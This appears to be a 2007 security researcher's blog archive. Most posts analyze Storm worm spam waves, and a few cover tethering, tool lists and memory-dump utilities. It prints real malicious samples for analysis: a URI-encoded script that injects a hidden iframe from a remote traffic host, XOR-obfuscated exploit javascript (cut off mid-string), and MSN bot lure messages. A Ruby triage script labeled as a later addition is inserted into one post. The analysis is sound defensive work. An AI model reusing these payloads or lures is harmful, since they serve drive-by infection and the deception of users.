Sunday, November 04, 2007

Tethering a Verizon BlackBerry 8830 with Mac OS X Leopard

These settings go into System Preferences under the Network area. You have to add a Bluetooth device and pair the phone as a modem. If you don't know how, read the forum post that got me this far. Those instructions work great with Tiger but did not work with Leopard; I had to make changes in the Advanced area to get it to work properly.

Username: PHONE_NUMBER@vzw3.com (not sure how important this is, I've done it with the BlackBerry Internet Service username also)
Password: vzw
Telephone: #777

Advanced button
Vendor: Generic
Model: Dialup Device
(Leave the rest as defaults)

Friday, November 02, 2007

Ruby snippet for URI decoding

Ruby Module URI::Escape

I was doing some quick analysis of a page that had some obfuscated javascript with URI-encoded text. Usually, I pull out the javascript and run it through SpiderMonkey (or Didier Stevens' modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for encoding/decoding things in hex, URI, binary and similar.

So, I took this opportunity to figure out the Ruby for deobfuscating something like this:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e
%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66
%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73
%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35
%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64
%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69
%66%72%61%6d%65%3e%27%29"));

Running this:
ruby -e 'require "uri"; p URI.unescape("<junk_from_above>")'

Returns this (p prints the string in inspect form, so each backslash in the decoded javascript shows up doubled):
"window.status='Done';document.write('<iframe name=9a7b4722 src=\\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\\' width=201 height=76 style=\\'display: none\\'></iframe>')"

Wednesday, October 24, 2007

VMware Server 1.0.4 on Ubuntu Server 7.10 (Gutsy Gibbon)

Note to self:
sudo apt-get install libxrender1 libxt6 libxtst6 libx11-6 build-essential xinetd linux-headers-2.6.22-14-server

I've heard VMware is available from one of the repositories, but I've not tried it. This is for installs from the downloaded tarball.

Thursday, October 18, 2007

Play that funky mus...stock spam, Storm

Storm has been sending out pump and dump spam for quite a while with everything from plain text to images to zips. Now, it's throwing MP3's at us. Here are two files below. So far, the subjects have been blank with "Re:" or "Fwd:".

Of note, the X-Mailer is "Microsoft Outlook Express 6.00.2800.1106" but that varies with each new iteration of storm. I've seen it claim to be Thunderbird in the past.

coolringtone.mp3
firstdance.mp3

Wednesday, October 17, 2007

Because there is no patch...

...for human stupidity. Which is why Storm keeps spreading. There is simply no excuse for people to continue infecting themselves. I'd take a stab at antivirus companies, but they simply can't keep up. Until they all move to true behavioral-based detection, they won't be able to handle the flood of malware coming from the miscreants out there.

Today, Storm worm brings us a new attempt to infect people by getting them to believe that there's a new filesharing application called Krackin. Great!

Below are samples of the e-mails, screenshots and the javascript exploits.

Subject:re: krackin is released
Body:New Sharing network goes live. Check out Krackin here.
http://xx.90.44.73/


Subject:re: krackin is online
Body:Ok, last time I am sending you this linkman. LOL write it down or
soothing. This is krackin. http://xx.74.85.128/


Subject:man here is the link
Body:man here is the next huge sharing network. It is friggin awesome. Check
it out. http://xx.37.24.109/



Here's a text file of the javascript exploit code. Handle with care!

Thursday, October 11, 2007

Kitties say Storm is better than catnip!

Just when I think there's nothing new going on with Storm, in flies a few new e-mails. This time it has similar content as before, but with the hook being a cute, crazy kitty cat.

Subject: You have just received an ecard.
Body: Check out the original Crazy Cat Card. It is too funny for words.
http://75.4.70.217/


Subject: Check out your ecard.
Body: Click here to view your laughing kitty card online. http://74.138.11.91/


Subject: You've got a greeting just for you!
Body: Please click here to view your Crazy Kitty Card Online.
http://99.162.220.182/

Here's a screenshot of the page:

After looking at the source and downloading the Flash animation (the cat), I used Flare to extract any scripts. I found that the original file came from http://www.superlaugh.com/1/catnip.swf. Both files were the same size, but the MD5s did not match.

movie 'catnip.swf' {
// flash 4, total frames: 127, frame rate: 12 fps, 360x450 px
  frame 1 {
    ifFrameLoaded (4) {
      gotoAndPlay(3);
    }
  }
  frame 2 {
    gotoAndPlay(1);
  }
  movieClip 5 {
  }
  button 7 {
    on (release) {
      getURL('http://www.superlaugh.com', '_top');
    }
  }
  movieClip 14 {
  }
  frame 125 {
    gotoAndPlay(3);
  }
}

The links on the page all go to SuperLaugh.exe, which was caught by 70% of the scan engines on VirusTotal. Obfuscated javascript was found at the bottom, just like in some previous versions. It looked to be the same set of exploits that has been used on and off since I first started looking into Storm a month or two ago.

Also, all the images, including the kitty Flash file, were sourced from the "/img" directory, but directory listing was disabled.

Tuesday, September 25, 2007

Links for AITP and FAEDS presentations

Thank all of you for attending my presentation. If you have any questions, please don't hesitate to e-mail me. Here are links to many of the things I talked about and demonstrated along with several that I didn't have time to get to.

My Websites
-----------------------------------
Personal Blog
http://www.johnhsawyer.com

Dark Reading Blog
http://www.darkreading.com/blog.asp?blog_sectionid=447

UF IT Security Team
http://infosec.ufl.edu

Malware Analysis and Sandboxes
-----------------------------------
VirusTotal (submit files for analysis)
http://www.virustotal.com/

CWSandbox - Behavior-based Malware Analysis
http://www.cwsandbox.org/

Anubis: Analyzing Unknown Binaries
http://analysis.seclab.tuwien.ac.at/index.php

Norman Sandbox
http://www.norman.com/microsites/nsic/Submit/en

Mandiant Red Curtain
http://www.mandiant.com/mrc

PEiD
http://www.secretashell.com/codomain/peid/

pefile (for you Python programmers)
http://dkbza.org/pefile.html

Firefox Extensions and SpiderMonkey
-----------------------------------
NoScript
http://noscript.net/

User Agent Switcher
http://chrispederick.com/work/user-agent-switcher/

WebDeveloper
http://chrispederick.com/work/web-developer/

SpiderMonkey
http://www.mozilla.org/js/spidermonkey/

Incident Response Tools (& more)
-----------------------------------
Sysinternals
http://www.microsoft.com/technet/sysinternals/default.mspx
(autoruns, tcpview, filemon, regmon, process monitor, process explorer, pstools)
Sysinternals Suite (all tools in one download)
http://www.microsoft.com/technet/sysinternals/Utilities/SysinternalsSuite.mspx

DiamondCS
http://www.diamondcs.com.au/consoletools.php
(cmdline, openports)

Wireshark - sniffer and protocol analyzer (formerly Ethereal)
http://www.wireshark.org

Helix - CD designed for incident response and forensics (Linux & Windows tools)
http://www.e-fense.com/helix/

Some Security Blogs
-----------------------------------
SANS Internet Storm Center
http://isc.sans.org

Windows Incident Response (Harlan Carvey) - event logs, registry and memory analysis & more
http://windowsir.blogspot.com/

int for(ensic){blog;} (Andreas Schuster) - event logs and memory analysis
http://computer.forensikblog.de/en/

Centralizing Windows Event Logs
-----------------------------------
Series of Posts on DarkReading about logs:
Log Central
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=132446
How to Centralize Windows Event Logs (links to Snare and Lasso)
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=132709
Watch Out for That Log!
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=133005

Miscellaneous Links
-----------------------------------
Metasploit Framework
http://framework.metasploit.com/

VMware (Workstation for Linux & Windows, Fusion for Mac, Server and Player are FREE )
http://www.vmware.com

Thursday, September 20, 2007

Process memory dumping tools

This is from a post I had over at ForensicFocus.com. I'm working on a presentation and was trying to come up with a list of all the useful process dumpers for Windows, so I did a little Googling and found my old post. I've put it here for my own future reference.


Everyone already knows about dd for Windows from George M. Garner, so I won't discuss it any further. Until tools like those developed for the 2005 DFRWS memory forensic challenge are released, dd memory images are only as useful as the strings you pull out of them.

There is some promising research from Mariusz Burdach, who just spoke at BlackHat Federal 2006 on "Finding Digital Evidence in Physical Memory." His website is at http://forensic.seccure.net/, but his memory forensics documentation is more up-to-date on the BlackHat Media Archives page. The tools/docs archive even has the Windows version of wmft.exe, which isn't on his webpage yet (just the Linux version of wmft is there).

Memdump was mentioned but there are at least two different versions for Windows that I know of. The one mentioned previously by APsoft and another from the Metasploit project.

APsoft's memdump will do any or all of memory.

MEMDUMP/386 for DOS Version 2.00 - Release 15-Jun-2005
(C) Copyright 1993-2005 by APSoft (http://www.tssc.de)
All rights reserved. Disassembly or decompilation prohibited.

This program dumps or copy any part of 4GB memory address space of your system.
For proper access to hardware registers, memory can be read with BYTE, WORD or
Double WORD granularity.

Syntax: MEMDUMP [/H|?]
                [/D[B|W|D][:Address[,Length]]]
                [/F:filename|none]
                [/B:filename]

where:  /H          - Print this text
        /D[B|W|D][:Address[,Length]]
                    - Dump <Length> number of memory bytes from specified
                      linear <Address> as bytes (DB), words (DW) or
                      double words (DD) correspondingly.
        /F:filename - Output file for the dump (Default: console)
                      Use /F:none to completely suppress dump
        /B:filename - Output file for the binary contents of memory

Notes: Both 'Address' and 'Length' can be expressed in hexadecimal format
with '0x' prefix. The 'Length' field can be also expressed in decimal
Examples:

MEMDUMP /DW:0x100000,0x100000 /F:2ndMB.dmp - dump second MB to file
MEMDUMP /DB:0x100000,128 - dump 128 Bytes to CON:
MEMDUMP /D:0,0x100 /F:none /B:IntTB.bin - copy INT table to file

If dump or binary file exists, MEMDUMP unconditionally overrides it.

If you are using WORD or DWORD access 'Length' parameter should be
multiple of 2 or 4 correspondingly.

Please remember that if the memory manager (such as EMM386.EXE) is
loaded, MEMDUMP will read linear address rather as physical address.


There is almost no help for the Metasploit memdump. It dumps a specific process given its PID and creates quite a few files that are meant to be analyzed with msfpescan. The file names look to be based on the memory segment each one was pulled from. Msfpescan is crashing on my Mac OS X box right now, so I can't show you its output, but here is the syntax and a sample of memdump running.

C:\>y:\memdump.exe
Usage: y:\memdump.exe pid [dump directory]

C:\>y:\memdump.exe 2796
[*] Creating dump directory...2796
[*] Attaching to 2796...
[*] Dumping segments...
[*] Dump completed successfully, 49 segments.

Then, there is pmdump that also dumps processes.


pmdump 1.2 - (c) 2002, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
- http://ntsecurity.nu/toolbox/pmdump/

Usage: pmdump <pid> <filename>
- dumps the process memory contents to a file

pmdump -list
- lists all running processes and their PID's


Microsoft has several versions of userdump, but I think the latest is version 8.0 and is less than a month old. As with Metasploit's memdump, there is another tool that can read the dumped output: Dumpchk (dumpchk.exe), which is part of the Debugging Tools for Windows package. For it to be most useful, you need the symbols, too.


User Mode Process Dumper (Version 8.0.2826.0)
Copyright (c) 1999-2005 Microsoft Corp. All rights reserved.

userdump -p
Displays a list of running processes and process IDs.

userdump [-k] <ProcessSpec> [<TargetDumpFile>]
Dumps one process or processes that share an image binary file name.

-k optionally causes processes to be killed after being dumped.

<ProcessSpec> is a decimal or 0x-prefixed hex process ID, or the
base name and extension (no path) of the image file used to create
a process.

<TargetDumpFile> is a legal Win32 file specification. If not specified,
dump files are generated in the current directory using a name
based on the image file name.

userdump -m [-k] <ProcessSpec> [<ProcessSpec>...] [-d <TargetDumpPath>]
Same as above, except dumps multiple processes.

-d <TargetDumpPath> supplies the directory where the dumps will go.
The default is the current directory.

userdump -g [-k] [-d <TargetDumpPath>]
Similar to above, except dumps Win32 GUI apps that appear hang.

userdump -I [-d <TargetDumpPath>]
To change just in time debugger to UserDump.
This command will not actually start UserDump.
If you don't setup userdump, please copy userdump.exe to %windir%\system32.

-d <TargetDumpPath> supplies the directory where the dumps will go.
The default is a current directory of the target process.

That's it that I can think of for now. I will probably remember the other one or two tonight. Hope all that helps give you some direction and a realization that there is no specific way to analyze memory, but quite a few people are interested and several smart people are doing some excellent research into the area.

Tuesday, September 18, 2007

MSN bot making the rounds

It has handy commands like main.wget, main.remove, msn.url, msn.self and msn.stop.

If you get one of the following and it includes a link to a site like photobucket.com or similar, don't click it. This came straight from a txt file an IRC bot was using as its source of deceptive messages being sent to MSN users.

This picture isnt you... right?
Wow i think i found your pic on myspace!
hey did i ever show you this picture of me?
can i up some of these pics of ya to my myspace profile?
you care if i put this pictuer of you in my new album?
sry about the messup i fixed the pic! Try it one more time plz
Can i put this pic of you into my new myspace album?
this looks like you lol
haha this guy up my street just slammed his $90k car into a telephone pole! I got a pic of it with my cellphone
Wanna see my pics before i send em to facebook?
do you think this picture is too kinky for Myspace?
I think this picture is terrible. but my friends on myspace want to see it. please dont show noone.
Have you seen me Naked Yet :D
ok I DO NOT like my new hair color.. but people on facebook do. what do you think? And no laughing! lol
hey you got a myspace album? anyways heres my new myspace album :) accept k?
do I look dumb in this picture? I want to put it on myspace.

Saturday, September 15, 2007

Storm brings "games" that pack a punch

Today, Storm includes e-mails about free games. The e-mails have gone back to using URLs with bare IP addresses rather than a domain like the most recent NFL messages. The web page includes pictures of all sorts of games, and every link goes to "ArcadeWorld.exe".



The Storm worm folks are also resorting to including exploit code. My guess is they just didn't get the number of infections they were hoping to with just including links to the *.exe with the NFL version.
Here's a screenshot of the obfuscated javascript.



This is after the first round of deobfuscating the javascript using SpiderMonkey; there is still another layer to analyze. The overly long filename for the WMV file looks like it is targeting MS06-006 (the Windows Media Player plug-in buffer overflow).



The do/while loop creates a string of 16,777,216 A's with the shellcode appended to the end, a classic heap spray.



Subject: Quick, grab this
Body: Click here to get over 1000 games for free http://xxx.0.188.5/

Subject: Quick, grab this
Body: Stop paying for games; we have over 1000 games for free online http://xx.57.250.77/

Subject: Thousands of hours of fun, for free
Body: Go http://xx.203.41.160/

Subject: Stop paying for games
Body: 1000 Online Free games, take a look http://xx.38.52.177/

Subject: The internet just got better
Body: Look http://xxx.54.195.27/

Thursday, September 13, 2007

freeNFLtracker.com now in use by Storm worm

Messages just started pouring in with links to http://freeNFLtracker.com/ instead of individual IP addresses. If you can blackhole the DNS, do so immediately to prevent users from being able to resolve the domain.

There is still no exploit code in the webpage, but it probably won't be long before it is included. I'm guessing the current page is so effective at getting users to click and run that there isn't a need for automatic exploitation.

Subject: Are you ready for football season?
Body: Want to know all the stats all the time this season? Get your free NFL Season Tracker!
http://freeNFLtracker.com/

Subject: Are you ready for football season?
Body: Are you ready for tonight's game? How about the whole season? Do you have your NFL Season Tracker?
http://freeNFLtracker.com/

Subject: The season has started
Body: Know every player and every stat, with this years Real-time NFL Tracker.
http://freeNFLtracker.com/

Here's the registrar info for FREENFLTRACKER.COM. For obvious reasons, they're using a privacy service to block the real registrant info.

Registration Service Provided By: LOMTI INC.
Contact: +351.3456712

Domain Name: FREENFLTRACKER.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 65
All Postal Mails Rejected, visit Privacyprotect.org
Monster
null,2680 AB
NL
Tel. +45.36946676

Creation Date: 13-Sep-2007
Expiration Date: 13-Sep-2008

Domain servers in listed order:
ns13.freenfltracker.com
ns12.freenfltracker.com
ns11.freenfltracker.com
ns10.freenfltracker.com
ns9.freenfltracker.com
ns8.freenfltracker.com
ns7.freenfltracker.com
ns6.freenfltracker.com
ns5.freenfltracker.com
ns4.freenfltracker.com
ns3.freenfltracker.com
ns2.freenfltracker.com

Saturday, September 08, 2007

Go! Fight! Storm..uhm..Score!

Just in time for football season, Storm worm is now targeting football fans with a free online game tracker. The page is much more elaborate than any of the others so far with more graphics, a table and an image map. Every link on the page goes to "tracker.exe" and there is no obfuscated javascript or exploit code in the page itself. It is solely relying on users to click and run the "tracker.exe".



Subject: FOOTBALL! Are You ready?
Body: Football Season Is Finally here!
Never miss a game again, and know all the stats.
Get you data online everyday from our free game tracker:
http://xx.179.106.14/

Subject: Free NFL Game Tracker
Body: Are you ready for some football?
Let us keep you on top of every game everyday.
Never be in the dark again with this online game tracker:
http://xx.8.83.172/

Subject: Do you have your NFL Game List?
Body: Football is back, Life may resume again!
We can keep you on top of every single game this season.
Get all your game info daily from our online game tracker:
http://xx.248.200.167/

Subject: Are you ready for some football?
Body: Life as we know it is back, NFL season is open.
Let us keep you on top of every game everyday.
Get all your game info daily from our online game tracker:
http://xx.211.219.222/

Thursday, September 06, 2007

sTORm preying on file sharers

This came in at 7:02am this morning after about two days of nothing new from Storm. Now the lure is a bogus Tor download for file sharers who want to protect themselves from "Big Brother." Tor anonymizes online activity by encrypting traffic and relaying it through a circuit of volunteer-run Tor nodes around the world, leaving through a random exit node. It is nice to see Tor getting some recognition, but hopefully it won't lead to too many new infections.

Here's a copy of the e-mail and a screenshot of the page.

Subject: Big brother is watching you.
Body: Do you trade files online? Then they will come after you. The news is full of articles of lawsuits by the RIAA. This program protects your online identity. Save yourself from an attack and use this free software now. Download Tor

Tuesday, September 04, 2007

A Stormy Labor Day celebration

I had a stormy Labor Day weekend in Hilton Head, but my Inbox also received new copies of Storm worm hoping to trick users into infecting themselves. They either tell users they have a new e-card or that there is a holiday greeting card waiting for them. The host with the malicious content has a cute Labor Day picture that links to "labor.exe".

All the same nasty obfuscated Javascript exploit code is still there and doesn't appear to have changed from what we were seeing last week.

Subject: Happy Labor Day
Body: Someone has sent you an E-Card. To view it, follow this link: http://ecards.com/funcard/edelivery?xz2dl2ifbi6r80hzk

Subject: The Big Labor Day Weekend
Body: Here is the link to view your holiday greeting online: http://hallmark.com/ecards/labor1?j7hesyq65ubntze680a1p67969wt2

Subject: Your friend has sent you a card.
Body: Click here to pick up your greeting card: http://netcards.com/cards/edelivery?p9n2q90enz4afj0

I do most of my javascript deobfuscation using technique #4 as detailed by Daniel Wesemann on the SANS Internet Storm Center site (http://isc.sans.org). I'll probably go over how I do it in a little more detail in an upcoming post.

Thursday, August 30, 2007

Quick template mod

I had to mod the Blogger template because it was feeling a bit restrictive and making the long posts scroll. Personally, I read blogs through Google Reader, but there are still a lot of people who go straight to the blog site, so this should make it easier for all of you.

Also, I was thinking of changing the title of the blog. Right now, it is "John H. Sawyer" which is because I'm too lazy to have come up with an original one. My DarkReading blog is called "Evil Bits" which Ben told me yesterday should be called "Naughty Bits." ;-) Thanks, Ben. Any ideas for blog titles?

Wednesday, August 29, 2007

Rock bands get a little Storm love

Whether that is good or bad, I'm sure it's going to make some college students and teens want to click on it. Two messages made it through this morning (see below). Today's Storm executable is "codec.exe". Even though the Storm worm host is serving up "codec.exe" as the current trick to get users to install (if they don't get owned by the embedded exploits first), it still usually hosts other EXE's based on previously seen names like "applet.exe", "video.exe", etc. The obfuscated javascript and exploits look to be the same as yesterday.

On this host, I was able to pull both "video.exe" and "codec.exe" but not "applet.exe"--at least, not a Storm binary. (I didn't bother trying the other half dozen filenames used in the past).

Here are the file sizes, MD5s, file types and the content of the page returned by the "applet.exe" request.
140367 Aug 29 10:52 codec.exe
140367 Aug 29 10:52 video.exe
529 Aug 29 10:52 applet.exe

MD5 (applet.exe) = 37fe7efbebfe417c25a92f76d163ea3b
MD5 (codec.exe) = 1ef03f4830c530799c57d67e1ccadc59
MD5 (video.exe) = 1ef03f4830c530799c57d67e1ccadc59

applet.exe: HTML document text
codec.exe: MS-DOS executable (EXE), OS/2 or MS Windows
video.exe: MS-DOS executable (EXE), OS/2 or MS Windows

Page content returned from the "applet.exe" request (nginx's 404 page, padded with comments so that IE shows the server's error page instead of its own "friendly" one):

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.5.17</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
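The checks above (size, MD5, file type, and spotting the same binary served under two names) as a script, added here as an example and not part of the original post. Everything it works on is constructed so it runs offline: codec.exe and video.exe are the same fake MZ stub, and applet.exe is the nginx 404 body shown above. Point it at real downloads pulled from a sandbox to use it for real.

```ruby
# Added example, not code from the original post.
require "digest"

# The 404 body from the post above, as served for applet.exe.
NGINX_404 = <<~HTML
  <html>
  <head><title>404 Not Found</title></head>
  <body bgcolor="white">
  <center><h1>404 Not Found</h1></center>
  <hr><center>nginx/0.5.17</center>
  </body>
  </html>
HTML

# Constructed stand-in for a PE file: "MZ" magic, the e_lfanew field at 0x3c
# pointing to 0x40, and the "PE\0\0" signature there. Not a real binary.
FAKE_MZ = ("MZ" + "\x00" * 58 + [0x40].pack("V") + "PE\x00\x00" + "\x00" * 100).b

# name => body, as if each had been downloaded from the Storm host.
SAMPLES = {
  "codec.exe"  => FAKE_MZ,
  "video.exe"  => FAKE_MZ.dup,
  "applet.exe" => NGINX_404,
}

# Cheap `file`-style identification from the magic bytes alone.
def identify(bytes)
  b = bytes.b
  if b.start_with?("MZ")
    pe_off = b.byteslice(0x3c, 4)&.unpack1("V")
    pe_off && b.byteslice(pe_off, 4) == "PE\x00\x00" ? "PE executable" : "MS-DOS executable"
  elsif b.lstrip.start_with?("<html", "<HTML", "<!DOCTYPE")
    "HTML document"
  else
    "unknown"
  end
end

# Size, MD5 and type per file, plus the groups of names that share a digest,
# so the same payload served under several filenames is obvious at a glance.
def triage(samples)
  report = samples.map do |name, bytes|
    { name: name, size: bytes.bytesize, md5: Digest::MD5.hexdigest(bytes), type: identify(bytes) }
  end
  dupes = report.group_by { |r| r[:md5] }.values
                .select { |g| g.size > 1 }
                .map { |g| g.map { |r| r[:name] } }
  { files: report, duplicates: dupes }
end

if __FILE__ == $0
  t = triage(SAMPLES)
  t[:files].each { |f| puts format("%8d  %s  %-18s %s", f[:size], f[:md5], f[:type], f[:name]) }
  t[:duplicates].each { |names| puts "same payload: #{names.join(', ')}" }
end
```

The point of the type check is the applet.exe case: a non-200 response saved straight to disk looks like a sample until you notice it is 529 bytes of HTML, so check the body before counting it as a binary.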

And, here's the content of the new e-mails.
Subject: Hot new video
Body: Foo Fighters just made a video you have got to see.

Be the first to see it. Click on the link to pull it off my server:
http://xx.25.176.66/
and

Subject: this video rockx
Body: Velvet Revolver
Check it out first. Go here for the video: http://xx.106.206.111/

Just got this one...

Subject: this video is not out yet
Body: Fat Boy just filmed their new video.

Be the first to see it. Click here to download it: http://xxx.211.45.200/

Tuesday, August 28, 2007

Storm takes one step back, six steps forward

I was getting bummed since I hadn't seen any Storm worm infection letters since yesterday around 3pm, but Storm worm loves me and would never leave me hanging. This just came in.

Subject: Helps us out and let us say thanks
Body: We are looking for Consumer opinions of our new software Home Reno Planner

This beta testing will enable us to fine tune the software for public release. A free copy of the program plus free updates will be yours for helping out.

Download the software, See What you think, and Email us your thoughts. If you would like to help us with this no obligation Beta test, follow this link to our secure download server: http://xx.183.196.147/setup.exe

Where is the obfuscated link to the IP? I was surprised to see the raw IP listed along with a link directly to an EXE. It is definitely Storm worm hosting the malware. A quick download and check of the server header shows:

HTTP/1.1 200 OK
Server: nginx/0.5.17
Date: Tue, 28 Aug 2007 14:59:22 GMT
Content-Type: application/octet-stream
Content-Length: 140367
Connection: close
Accept-Ranges: bytes

Bringing up http://xx.183.196.147/ without the "setup.exe" shows it is also doubling as a StormTube host, complete with obfuscated javascript that takes a shotgun approach to exploiting the web browser. A cursory glance shows about a half dozen exploits that may be for IE WebViewFolderIcon setSlice(), WinZip WebViewFolderIcon, Yahoo WebCam, Microsoft 'msdds.dll' COM Object, QuickTime and AdobeWScriptShell.
Since including code in the body of the blog is a pain, here's the files if you want to play with them.

Wish List: PE Posters

Ero Carrera has created a CafePress store to sell poster-sized versions of his "Portable Executable Format: A File Walkthrough" and "Portable Executable Format."

How hot are these? Check out his blog post about it for more info.

Thursday, August 23, 2007

The Ever Changing Storm

Storm worm just keeps rolling with the punches. After you warn users, family and friends about the bogus messages and how to identify them, Storm changes it up. This time, they figured out that users might not click on a bare IP address, so they've hidden it behind an HTML link.

Welcome,

We are glad you joined Free Ringtones.

Account Number: 895942644
Login ID: user2662
Your Password ID: zi461

For security purposes please login and change the temporary Login ID and Password.

Click on the secure link or paste it to your browser: Free Ringtones

Thank You,
Welcome Department
Free Ringtones

Or

OMG, what are you doing man. This video of you is all over the net. check it out yourself http://www.youtube.com/watch?v=pQoPSGAGXMW

or...there are just too many to include. It's quite amazing. When the messages were pr0n related, with subjects like "Do you think my bra is too tight. Maybe I should take it off. let me know what you think" and "Oh man I found these pictures of my ex-secretary on her computer after I fired her. Check em out!", they all had the following in their headers:

X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

The new membership e-mails don't have any mail client info. The Storm worm host the e-mail points to does serve obfuscated javascript with an exploit payload. Note: some of this code is going to scroll off the screen. I just couldn't figure out an elegant way of doing it so it's just gonna look like crap. ;-)

<img src="http://www.youtube.com/img/pic_youtubelogo_123x63.gif">
<br><br>Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can <a href="/video.exe">click here</a> to launch the download and then press Run.

<Script Language='JavaScript'>

function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; }

var plain_str = "\xb3\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\xaf\xdb\xc7\xde\xdf\xad\xaf\xdb\xd6\xd2\xd7\xad\xaf\xc0\xd0\xc1\xda\xc3\xc7\xad\xe5\xf2\xe1\xb3\xe0\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb1\xba\xa8\xf7\xfc\xe8\xe0\xb8\xae\xe0\xa8\xee\xe4\xfb\xfa\xff\xf6\xbb\xe0\xbd\xff\xf6\xfd\xf4\xe7\xfb\xaf\xa3\xeb\xa3\xaa\xa3\xa3\xa3\xa3\xa3\xba\xa8\xe0\xb8\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa6\xa7\xd6\xd1\xb6\xe6\xa4\xa6\xab\xd1\xb6\xe6\xab\xd1\xa0\xd0\xb6\xe6\xa0\xa6\xa4\xa7\xb6\xe6\xa3\xa0\xa4\xab\xb6\xe6\xa6\xa5\xd5\xa6\xb6\xe6\xa4\xa5\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa3\xb6\xe6\xa0\xa0\xd5\xa6\xb6\xe6\xa7\xaa\xd0\xaa\xb6\xe6\xd2\xd7\xa7\xa2\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa3\xd5\xa0\xa5\xb6\xe6\xa2\xa7\xd1\xd6\xb6\xe6\xa0\xab\xa1\xab\xb6\xe6\xa4\xa7\xd5\xa1\xb6\xe6\xd0\xa2\xa3\xab\xb6\xe6\xa3\xd7\xd0\xd1\xb6\xe6\xd7\xd2\xa3\xa0\xb6\xe6\xd6\xd1\xa7\xa3\xb6\xe6\xa0\xd1\xd6\xd5\xb6\xe6\xa4\xa6\xd7\xd5\xb6\xe6\xa6\xd6\xd6\xa4\xb6\xe6\xa6\xd6\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa7\xb6\xe6\xa5\xa5\xd7\xd7\xb6\xe6\xa3\xd0\xab\xd1\xb6\xe6\xab\xd1\xa7\xd1\xb6\xe6\xa2\xd0\xa6\xd6\xb6\xe6\xd7\xd7\xa3\xa0\xb6\xe6\xa3\xa7\xab\xd1\xb6\xe6\xa3\xa0\xab\xd1\xb6\xe6\xd0\xa0\xd0\xa6\xb6\xe6\xa4\xa1\xa4\xa
